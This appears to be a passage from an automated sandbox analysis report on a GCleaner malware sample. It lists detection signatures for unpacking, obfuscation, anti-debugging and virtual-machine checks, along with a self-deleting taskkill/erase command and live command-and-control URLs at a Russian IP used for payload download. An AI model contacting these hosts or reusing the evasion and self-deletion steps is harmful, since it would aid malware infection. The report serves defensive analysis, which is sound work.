Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004083EE push ecx; ret 0_2_00408401
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040FEBA push es; ret 0_2_0040FEBB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060407F push esp; retf 0_2_00604087
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600121 push es; ret 0_2_00600122
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060C575 push ss; retf 0_2_0060C579
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F8655 push ecx; ret 0_2_005F8668
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060467D push esp; retf 0_2_0060467E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7443 push ecx; ret 0_2_007C7444
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C68FD pushfd ; ret 0_2_007C6905
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7117 push ecx; ret 0_2_007C7118
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C81F5 pushad ; ret 0_2_007C81F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C5E78 pushad ; retf 0_2_007C5EB4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9EC4 push ecx; ret 0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9E93 push ecx; ret 0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C871B push es; ret 0_2_007C871C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9F0D push ecx; ret 0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 9.6 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004306A8 GetSystemTimes followed by cmp: cmp dword ptr [00437b24h], 0ah and CTI: jne 004308A0h 0_2_004306A8
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2073863942.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, 00000000.00000002.2073485392.000000000086B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW 7
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, 0_2_004018E0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004084E5
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411002 mov eax, dword ptr fs:[00000030h] 0_2_00411002
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C4F1 mov eax, dword ptr fs:[00000030h] 0_2_0040C4F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F092B mov eax, dword ptr fs:[00000030h] 0_2_005F092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00601269 mov eax, dword ptr fs:[00000030h] 0_2_00601269
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h] 0_2_005F0D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FC758 mov eax, dword ptr fs:[00000030h] 0_2_005FC758
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C4A8B push dword ptr fs:[00000030h] 0_2_007C4A8B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004168EC GetProcessHeap, 0_2_004168EC
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407B06 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00407B06
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004084E5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408679 SetUnhandledExceptionFilter, 0_2_00408679
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BFEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040BFEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F88E0 SetUnhandledExceptionFilter, 0_2_005F88E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FC252 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005FC252
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F7D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005F7D6D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F874C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005F874C
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f Jump to behavior
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004086E3 cpuid 0_2_004086E3
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00418885
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00418910
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00411112
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00418B63
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00418C89
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00418D8F
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00418E5E
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00411634
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_004187EA
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0041879F
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_006090C5
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0060189B
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00608A51
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00608A06
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00608AEC
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00608B77
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00601379
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00608DCA
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00608EF0
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00608FF6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C891 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0040C891
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected GCleaner
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected GCleaner
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1500394 Sample: file.exe Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 24 Multi AV Scanner detection for domain / URL 2->24 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 6 other signatures 2->30 7 file.exe 22 2->7         started        process3 dnsIp4 22 80.66.75.114, 49730, 80 RISS-ASRU Russian Federation 7->22 32 Detected unpacking (changes PE section rights) 7->32 34 Detected unpacking (overwrites its own PE header) 7->34 11 WerFault.exe 21 16 7->11         started        14 cmd.exe 1 7->14         started        signatures5 process6 file7 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->20 dropped 16 taskkill.exe 1 14->16         started        18 conhost.exe 14->18         started        process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
80.66.75.114
 unknown Russian Federation
20803 RISS-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://80.66.75.114/files/download true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://80.66.75.114/add?substr=one&s=two true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown